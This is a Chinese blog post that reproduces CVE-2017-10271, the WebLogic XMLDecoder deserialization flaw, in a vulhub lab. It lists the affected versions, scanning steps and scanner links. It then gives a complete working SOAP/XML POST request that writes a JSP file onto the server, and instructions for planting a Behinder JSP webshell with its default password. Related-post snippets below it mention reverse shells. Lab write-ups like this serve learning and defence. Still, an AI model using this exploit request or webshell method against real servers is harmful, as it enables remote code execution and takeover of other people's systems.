CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)

原创 已于 2022-07-29 17:42:54 修改 · 5.3k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#servlet #java #开发语言

于 2022-07-29 17:42:01 首次发布

最近在打vulhub的靶场记录一下,我是小菜鸡一个,不对的地方还请指教。废话不多说开始。

原因:

        CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。

影响版本:

    10.3.6.0.0

    12.1.3.0.0

    12.2.1.1.0

    12.2.1.2.0

复现过程:

一、使用sudo nmap -Pn -v -sV 192.168.88.132,扫描目标的服务及版本:

二、使用工具进行扫描:

https://github.com/rabbitmask/WeblogicScan

https://gitee.com/omg2019/WeblogicScan-1  —>推荐

存在cve-2017-10271漏洞

三、访问Ip:7001/wls-wsat/CoordinatorPortType11出现以下内容可能存在漏洞。

四、访问页面使用burp进行抓包,将数据包修改,点击上传显示500说明写入成功, 访问http://ip:7001/bea_wls_internal/c.jsp,正常显示写入的文本。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/c.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

访问存在

五、接下来就可以写入webshell了,这里使用冰蝎自带的jsp webshell。默认密码为: rebeyond如果想改的话密码为32位md5值的前16位。写入成功后访问http://ip:7001/bea_wls_internal/3.jsp

 关注公众号Sanx白帽子 发送 ssrf 获取对应的利用工具

Sanx.
关注
WebLogic:CVE-2017-10271[XML反序列化]
h1008685的博客
08-01 965
WebLogic:CVE-2017-10271[XML反序列化],漏洞成因,环境部署,漏洞利用:1.漏洞发生页 2.配置poc请求包,3.kali监听端口,4.bp发送poc请求包,5.连接建立成功
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
m0_66299232的博客
04-12 768
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。5.因为执行whoami是无回显的,所以需要借助dnslog.cn网站进行回显。
WeblogicCVE-2017-10271
01-03
weblogic打补丁操作步骤 主义更换路径!攻击者针对WebLogicWLS组件中存在的CVE-2017-10271远程代码执行漏洞,构造请求对运行的WebLogic中间件主机进行攻击,由于该漏洞利用方式简单,且能够直接获取目标服务器的控制权限,影响范围较广,近期发现此漏洞的利用方式为传播虚拟币挖矿程序,不排除会被黑客用于其他目的的攻击。
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 2406
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令,
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
最新发布
绘梨衣の沉默的博客。主要是CTF竞赛,网络安全,渗透测试,HVV,以及学习到的各种知识的分享
09-25 289
本文介绍了Weblogic WLS Security组件XML反序列化漏洞(CVE-2017-10271)的复现过程。该漏洞影响Weblogic<10.3.6版本,攻击者可通过发送恶意XML数据包在服务器执行任意命令。复现步骤包括搭建Docker测试环境、验证漏洞端点、发送包含反弹Shell的恶意请求,最终成功获取Shell并写入Webshell。漏洞利用成功的关键在于对Shell语句进行正确编码以避免XML解析错误。
CVE-2017-10271
Dikesi的博客
02-10 2236
Weblogic WLS组件远程代码执行漏洞
Weblogic ‘wls-wsat‘ XMLDecoder 反序列化漏洞 CVE-2017-10271 漏洞复现
Senimo
08-02 876
Weblogic 'wls-wsat' XMLDecoder 反序列化漏洞 CVE-2017-10271 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 Weblogic 的 WLS Security 组件对外提供 webservice 服务,其中使用了 XMLDecoder 来解析用户传入的 XML 数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 二、漏洞影响 Weblogic < 10.3.6 三、漏洞复现 1、环境搭建 c
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
2017年,WebLogic服务器被发现存在一个名为CVE-2017-10271的安全漏洞,这是一个高危级别的反序列化漏洞。这个漏洞允许攻击者通过构造恶意的Java对象序列化数据,远程执行任意代码,从而控制受影响的系统。 **CVE-...
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271)深度解析与实战复现
ai0070411的博客
03-14 1266
攻击者通过构造恶意XML请求,利用XMLDecoder反序列化机制绕过安全验证,最终实现服务器权限接管。
weblogic CVE-2017-10271漏洞复现
qq_68581192的博客
05-24 2141
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
weblogic漏洞——CVE-2017-10271
weixin_57379923的博客
08-10 820
需要再请求头中加入 Content-Type: text/xml,并且改为 POST 方法。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。
Weblogic--CVE-2017-10271
haha1314的博客
07-15 503
Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞CVE-2017-10271Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 环境搭建 启动测试环境: docker-compose up -d 等待一...
weblogic-CVE_2017_10271
m0_62146983的博客
03-13 878
打开网页发现是weblogic的报错页面。
weblogic 反序列化CVE-2017-10271
YouthBelief的博客
11-01 1555
weblogic 反序列化CVE-2017-10271) 0x01 漏洞描述 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 7001端口 0x02 环境搭建 vulfocus靶场 目录wls-wsat/CoordinatorPortType 如果访问/wls-wsat/CoordinatorPort
Weblogic反序列化漏洞CVE-2017-10271
weixin_46411728的博客
11-14 1831
Weblogic反序列化漏洞CVE-2017-10271
Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)
又菜又爱倒腾的博客
10-29 1332
#Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)# 一、漏洞简介 weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 二、漏洞影响 影响版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0 三、产生原因 CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值